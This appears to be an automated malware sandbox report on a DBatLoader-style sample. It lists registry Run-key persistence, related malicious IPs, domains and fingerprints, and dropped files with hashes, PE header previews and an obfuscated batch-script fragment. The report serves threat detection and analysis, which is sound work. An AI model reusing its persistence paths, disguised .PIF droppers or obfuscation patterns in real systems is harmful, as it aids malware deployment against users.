                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                            Simulations

                                                                                            Behavior and APIs

                                                                                            TimeTypeDescription
                                                                                            02:24:39API Interceptor2x Sleep call for process: EPTMAcgvNZ.exe modified
                                                                                            02:25:00API Interceptor2x Sleep call for process: Cobsfhiy.PIF modified
                                                                                            04:03:08API Interceptor399635x Sleep call for process: yihfsboC.pif modified
                                                                                            08:24:49AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Cobsfhiy C:\Users\Public\Cobsfhiy.url
                                                                                            08:24:59AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Cobsfhiy C:\Users\Public\Cobsfhiy.url

                                                                                            Joe Sandbox View / Context

                                                                                            IPs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            132.226.8.169INV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            Papyment_Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            sosoliso.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            order requirements CIF-TRC809945210.exeGet hashmaliciousGuLoaderBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            STAFF RECORD_pdf.arj.exeGet hashmaliciousUnknownBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • checkip.dyndns.org/

                                                                                            Domains

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            s3-w.us-east-1.amazonaws.comD2pQ4J4GGZ.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            • 3.5.29.78
                                                                                            qqig1mHX8U.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                                            • 16.182.101.153
                                                                                            https://www.cinehub.click/anusGet hashmaliciousUnknownBrowse
                                                                                            • 52.217.225.81
                                                                                            https://temp.farenheit.net/XMDNvVFp0d0NmOUNSbFJTSVB2QTRuZktxeWdPaG5ReWxrK1NleVgvbGgvakhBRU5TWkZPQW14RDZLMTlST0pJK3Jja1R0bjkyZkxubHc1UXhLdmU5UVNJcVIyU25JdFVIV0hEc3l3R0kvb3VpWWFlWGxvWmJMSDIwaWRkYTV3c2V3ZnpXcVArUkJXbEpTeWU1SCtuRWNpRVI2RFFuNXh1ODEyQUx3WlNCdDB1N3NjcDh2M1p4MU9qSkJ0R2VDV0VDeVJ4THU5bDM5SkkvaGMxc1hEc3pOb0VtcWl0cDUxemRyc1BwMkE9PS0tRklOcExLZUVZVVZGemhWRC0teTZKNGN1UnI2dUIxL3E5Zm91Q2hVZz09?cid=2268024206Get hashmaliciousKnowBe4Browse
                                                                                            • 52.217.192.233
                                                                                            https://webconference.protected-forms.com/XUktQL21CbERuN3Ftbmk5UlBMbGhLNWU5aGswN2dIN014czFGV0c2YnRkQkFmNTh5T2RFZTJpSnRkYXZoMGdjMkR2Zk1JQXk1N0F1cFBQbTlZTjFJLzIyY0JXOG5RM2NtL3p3ZW5tSFhuUFdCdjFmRFhMSC9kVHErbytLbmdDeWVUL3hKcmkwaGh1NHJrbzV2UCszK0tOZ3RHb0FPdkN1cE5CMFZFQytIL2lBekM3dmFCTWhJckE9PS0tOFFraUx6Q2RGc1dJb0I0bi0taW9KaWdEQ3l6WnQ4Rmw2U29qT05Udz09?cid=2104653964Get hashmaliciousKnowBe4Browse
                                                                                            • 52.217.161.105
                                                                                            https://cards.greetingsweb.com/4b62f1c1a5202af4?l=41Get hashmaliciousUnknownBrowse
                                                                                            • 54.231.202.65
                                                                                            sostener.vbsGet hashmaliciousRemcosBrowse
                                                                                            • 52.217.196.57
                                                                                            900092839283982.exeGet hashmaliciousDBatLoader, VIP KeyloggerBrowse
                                                                                            • 52.216.214.9
                                                                                            https://www.zealxllc.com/sgvGet hashmaliciousUnknownBrowse
                                                                                            • 3.5.12.15
                                                                                            S0FTWARE.exeGet hashmaliciousStealc, VidarBrowse
                                                                                            • 3.5.30.241
                                                                                            bitbucket.orgD2pQ4J4GGZ.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            • 185.166.143.49
                                                                                            qqig1mHX8U.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                                            • 185.166.143.50
                                                                                            05.Unzipped.obfhotel22-11.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                            • 185.166.143.48
                                                                                            0a0#U00a0.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                            • 185.166.143.48
                                                                                            OGo8AQxn4k.vbsGet hashmaliciousUnknownBrowse
                                                                                            • 185.166.143.48
                                                                                            3o2WdGwcLF.vbsGet hashmaliciousUnknownBrowse
                                                                                            • 185.166.143.50
                                                                                            sostener.vbsGet hashmaliciousRemcosBrowse
                                                                                            • 185.166.143.49
                                                                                            900092839283982.exeGet hashmaliciousDBatLoader, VIP KeyloggerBrowse
                                                                                            • 185.166.143.49
                                                                                            0a0#U00a0.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                            • 185.166.143.50
                                                                                            m2.exeGet hashmaliciousXmrigBrowse
                                                                                            • 185.166.143.49

                                                                                            ASNs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            TELEGRAMRUINV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            DJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                            • 149.154.167.220
                                                                                            2ehwX6LWt3.exeGet hashmaliciousXWormBrowse
                                                                                            • 149.154.167.220
                                                                                            Mzo6BdEtGv.exeGet hashmaliciousXWormBrowse
                                                                                            • 149.154.167.220
                                                                                            tE3ZXBTP0B.exeGet hashmaliciousXWormBrowse
                                                                                            • 149.154.167.220
                                                                                            Pe4905VGl1.batGet hashmaliciousAsyncRATBrowse
                                                                                            • 149.154.167.220
                                                                                            MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                                                                            • 149.154.167.220
                                                                                            November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                                                            • 149.154.167.220
                                                                                            UTMEMUSINV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 132.226.8.169
                                                                                            dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 132.226.8.169
                                                                                            AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                            • 132.226.247.73
                                                                                            order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 132.226.8.169
                                                                                            NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 132.226.247.73
                                                                                            MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 132.226.8.169
                                                                                            New shipment AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                            • 132.226.247.73
                                                                                            rorderrequirementsCIF-TRC809910645210.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 132.226.247.73
                                                                                            PaymentAdvice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 132.226.247.73
                                                                                            S50MC-C_3170262-7.6cylinder_liner.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 132.226.247.73
                                                                                            AMAZON-02USD2pQ4J4GGZ.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            • 185.166.143.49
                                                                                            C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                            • 18.141.10.107
                                                                                            qqig1mHX8U.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                                            • 185.166.143.50
                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                            • 108.139.47.92
                                                                                            x86_64.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                            • 54.171.230.55
                                                                                            sample.shGet hashmaliciousUnknownBrowse
                                                                                            • 54.171.230.55
                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                            • 3.162.174.58
                                                                                            https://cp-wb-pe-2-ujft-9-kslojlj-5-gdr-3-cwge-5-h5-posg-3.vercel.app/?web=minjeong.cho@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                            • 76.76.21.142
                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                            • 13.226.94.67
                                                                                            FW Expiration Pending Support Care HIPAA Acknowledgement Form 2024.emlGet hashmaliciousUnknownBrowse
                                                                                            • 35.164.51.148

                                                                                            JA3 Fingerprints

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            3b5074b1b5d032e5620f69f9f700ff0eC6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                            • 149.154.167.220
                                                                                            2jbMIxCFsK.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                            • 149.154.167.220
                                                                                            Packing List - SAPPHIRE X.xlsx.scr.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                            • 149.154.167.220
                                                                                            WOOYANG VENUS PARTICULARS.pdf.scr.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                            • 149.154.167.220
                                                                                            5QnwxSJVyX.docGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                            • 149.154.167.220
                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                            • 149.154.167.220
                                                                                            file.exeGet hashmaliciousFormBookBrowse
                                                                                            • 149.154.167.220
                                                                                            file.exeGet hashmaliciousFormBookBrowse
                                                                                            • 149.154.167.220
                                                                                            Orden de compra HO-PO-376-25.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                            • 149.154.167.220
                                                                                            a0e9f5d64349fb13191bc781f81f42e1D2pQ4J4GGZ.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            • 185.166.143.48
                                                                                            • 16.182.70.225
                                                                                            C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                            • 185.166.143.48
                                                                                            • 16.182.70.225
                                                                                            2jbMIxCFsK.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                            • 185.166.143.48
                                                                                            • 16.182.70.225
                                                                                            9oKqST-uPDy7iigkXM-C5J2.emlGet hashmaliciousUnknownBrowse
                                                                                            • 185.166.143.48
                                                                                            • 16.182.70.225
                                                                                            1m181Ru74o.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            • 185.166.143.48
                                                                                            • 16.182.70.225
                                                                                            jlPBMMQbXC.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                            • 185.166.143.48
                                                                                            • 16.182.70.225
                                                                                            qqig1mHX8U.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                                            • 185.166.143.48
                                                                                            • 16.182.70.225
                                                                                            nft438A5fN.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                            • 185.166.143.48
                                                                                            • 16.182.70.225
                                                                                            6BE4RDldhw.exeGet hashmaliciousDBatLoaderBrowse
                                                                                            • 185.166.143.48
                                                                                            • 16.182.70.225
                                                                                            AnyDesk.exeGet hashmaliciousDBatLoaderBrowse
                                                                                            • 185.166.143.48
                                                                                            • 16.182.70.225

                                                                                            Dropped Files

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            C:\Users\Public\Libraries\yihfsboC.pifC6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                              2jbMIxCFsK.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                qqig1mHX8U.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                                                  RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                    IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                      Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                          Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                            x.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                              TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse

                                                                                                                Created / dropped Files

                                                                                                                C:\Users\Public\Cobsfhiy.url

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\EPTMAcgvNZ.exe
                                                                                                                File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Cobsfhiy.PIF">), ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):103
                                                                                                                Entropy (8bit):5.040869887509748
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMgDNM6fsbxJQKXvn:HRYFVmTWDyz9MqEx7/n
                                                                                                                MD5:8EB1493A9DE5730B408CFC787C954A6E
                                                                                                                SHA1:7E588245670B01A85218ABEF86655E5A39A69617
                                                                                                                SHA-256:47863E0A471F4CCD3DF71FE71465D647D44C22F284361C6CD8CDF486AC5709CC
                                                                                                                SHA-512:34063FBE80746C4B85D4A8FACD7AB64054269E99723B2EF2AB9B4B7DDB6A07346FF501012C2AD7EB5F2F639B0A6BD32172928A43323589D7B1AD04F34255AC5B
                                                                                                                Malicious:true
                                                                                                                Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Cobsfhiy.PIF"..IconIndex=915509..HotKey=5..

                                                                                                                C:\Users\Public\Libraries\Cobsfhiy

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\EPTMAcgvNZ.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):561958
                                                                                                                Entropy (8bit):6.968997844387319
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:gAabuLGiAvJSswdYvgB/CBXakJpLqQszzFG/oota3:0Kz0+dYvM/C4ZzzFG/Lta3
                                                                                                                MD5:F481AA81C109EF427F031D402F04F98E
                                                                                                                SHA1:E0D32E04CDCFF429DCD53AF6550DF64401F9B764
                                                                                                                SHA-256:6A5355D9405BBA24CD90E37409194027EF4D453A0387692586F71C4030AC0656
                                                                                                                SHA-512:4BD37DDA5109C852ADC3ACCD9B4859AFC799117526B72729BBB7F29979C771870BDB50AE3A85D73BF60DEC5721F452D05F50D561C77DCB78D66ADB9A3CA04D58
                                                                                                                Malicious:true
                                                                                                                Preview:...`*..R..+#!...-..&".... ...#..,.(.-..(.....+.-"(&"$.*+(%.......`*..RU#.'...-.!,...`*..R..W...I....R.E........G......E........D......F........P......E........C......Q....].R.>....W.A....T.^.4......B......U.Q......L......T.4....X.N.....U..6....W.9......_.M......6........E......I....Z...Q....X.J....X]..C......Q.....Z..F......K....X.U.>......3....R.\........D........A......Q........@......4....._..J......3........3......Q........D......C....Z`R.O....].4....V_`.F......K....]...J......F....\.`.A......N.....`Z.8....U.Q....W...I....R.E........G.....]....0]1X.)......21V....'Y.RU1`+.Y.......+&T&R&,.-.`.%...V...T.^....W.UTSV..... ).TVT..1\..............]...V......[....*...].[#..Z^&Z-......^..Y....!"._)$1Z.-.].)..#/.WZ.(..SY.W.UTSV............!0T.2\2........._....'#..22...%"-....b......-Z1+.b^T...X2.................!`.*.W-%+T.^.SY.W.U...0T-$YZ.(/[*\.,\..........()[#Z.$./"..2V,X..^.SY...!...^1Z*YZ..... $ .Y...."..#)R1\"..)..Z`a/*bY.aV.S.U.(...V^1V.-$.b'1(V^10.-$U.*%%^%V...&...\!..(.Wb.Y!.S/.).U

                                                                                                                C:\Users\Public\Libraries\Cobsfhiy.PIF

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1297920
                                                                                                                Entropy (8bit):7.351894430686878
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:uPHhFG0TMHw0kEWIo7rVTR8XzSz4FMzDVW1SKCDH7:uPBZIMJTmjSmM3UxAH7
                                                                                                                MD5:DC614075998696B44ADA8A2EED23FC03
                                                                                                                SHA1:911B29FF40B13F6935568153F178867E10946311
                                                                                                                SHA-256:059971FF3A7ED8438AE50F1AE60BC161E93C0B32F8A2B3C5A0E56BBFA05D9CD5
                                                                                                                SHA-512:ABD7C8F466B5C856A1A0862180598FBF32B9854EC4C4D6529C0FC3B45F642F538B2E52A5AD27C913F164B74306240BF84082D2DD69C8998A233C7379B749646B
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.............................(.......0....@..........................P...................@...........................`...(...0..........................lx..................................................Pg..8............................text............................... ..`.itext....... ...................... ..`.data........0......................@....bss.....:... ...........................idata...(...`...*..................@....tls....4............4...................rdata...............4..............@..@.reloc..lx.......z...6..............@..B.rsrc........0......................@..@.............P......................@..@................................................................................................

                                                                                                                C:\Users\Public\Libraries\PNO

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\EPTMAcgvNZ.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):3
                                                                                                                Entropy (8bit):1.584962500721156
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:L:L
                                                                                                                MD5:A0B6C3E24F6F2433B030951BC488F759
                                                                                                                SHA1:1D383314988E188C925A9B47065E1285E25551E3
                                                                                                                SHA-256:9B6DD0F55D1CEA37555DB317F53A0631F694BD46DF8018CC2AEED3D9E2F32F5F
                                                                                                                SHA-512:16E024531F95614599758CB3996E5A9303AF312912C7EADE0B27BD46979A6C0704E8D63D09BBBC81F94A3D762F8A256005DCA4A6C531BCD262A8583E7EE7A74F
                                                                                                                Malicious:false
                                                                                                                Preview:7..

                                                                                                                C:\Users\Public\Libraries\yihfsboC.cmd

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\EPTMAcgvNZ.exe
                                                                                                                File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):62357
                                                                                                                Entropy (8bit):4.705712327109906
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                                                                MD5:B87F096CBC25570329E2BB59FEE57580
                                                                                                                SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                                                                SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                                                                SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                                                                Malicious:false
                                                                                                                Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .

                                                                                                                C:\Users\Public\Libraries\yihfsboC.pif

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\EPTMAcgvNZ.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):68096
                                                                                                                Entropy (8bit):6.328046551801531
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                                                MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                                                SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                                                SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                                                SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: C6dAUcOA6M.exe, Detection: malicious, Browse
                                                                                                                • Filename: 2jbMIxCFsK.exe, Detection: malicious, Browse
                                                                                                                • Filename: qqig1mHX8U.exe, Detection: malicious, Browse
                                                                                                                • Filename: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat, Detection: malicious, Browse
                                                                                                                • Filename: IBKB.vbs, Detection: malicious, Browse
                                                                                                                • Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious, Browse
                                                                                                                • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                                                                                                • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                                                                                                • Filename: x.exe, Detection: malicious, Browse
                                                                                                                • Filename: TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd, Detection: malicious, Browse
                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@

                                                                                                                C:\Users\Public\alpha.pif

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):236544
                                                                                                                Entropy (8bit):6.4416694948877025
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                                                                MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                                                                SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                                                                SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                C:\Users\Public\xpha.pif

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):18944
                                                                                                                Entropy (8bit):5.742964649637377
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
                                                                                                                MD5:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
                                                                                                                SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
                                                                                                                SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z..................*...2......P4.......@....@..................................c....@...... ..........................`a..|....p.. ...............................T............................................`..\............................text....).......*.................. ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                \Device\ConDrv

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):594
                                                                                                                Entropy (8bit):4.679530362953372
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:qn7ZxTz9MEeSbZ7u0wxDDDDDDDDjCaY58O6aYASWXd7TB8NGNY:6xTzuEp7u0wQakQaNt7t8N/
                                                                                                                MD5:752F0BA7EC44AF7D743E1B8711A4C0F0
                                                                                                                SHA1:A034D557D7D79AD6682EB621C95ACF31A9786614
                                                                                                                SHA-256:0A63846682F4C541324E43927B98DD6AC6CE16F2003CBA76E37F4DFBEF87FC1D
                                                                                                                SHA-512:7C782C450D36151BA7A0899D7BD4D93042913CF6B25035AFB4F500EAC1595C16FDC8F62BDFA86CF17485482E630044A356D173105B4915A8692754E8633C4A54
                                                                                                                Malicious:false
                                                                                                                Preview:..Initiating COPY FILE mode..... Source File: C:\Users\user\Desktop\EPTMAcgvNZ.exe...Destination File: C:\\Users\\Public\\Libraries\\Cobsfhiy.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x13ce00 (1297920) (1 MB)....Total bytes written = 0x13d000 (1298432) (1 MB).......Operation completed successfully in 0.125 seconds.....

                                                                                                                \Device\Null

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):560
                                                                                                                Entropy (8bit):4.530060792873685
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjCaY5B4aYA/4TB8NGNJ:/p4xT5cp7u0wQakB4aV4t8Nc
                                                                                                                MD5:9BEF8DE54A193A94D9A1EAD191C8984E
                                                                                                                SHA1:30ED4B43C4DE6754E64ED46E18BF0E00FCD138A2
                                                                                                                SHA-256:4205CE0B3465201AA88E0A5C8BE1B503C0BDFA30217BBC47BF5F89370D04FF3B
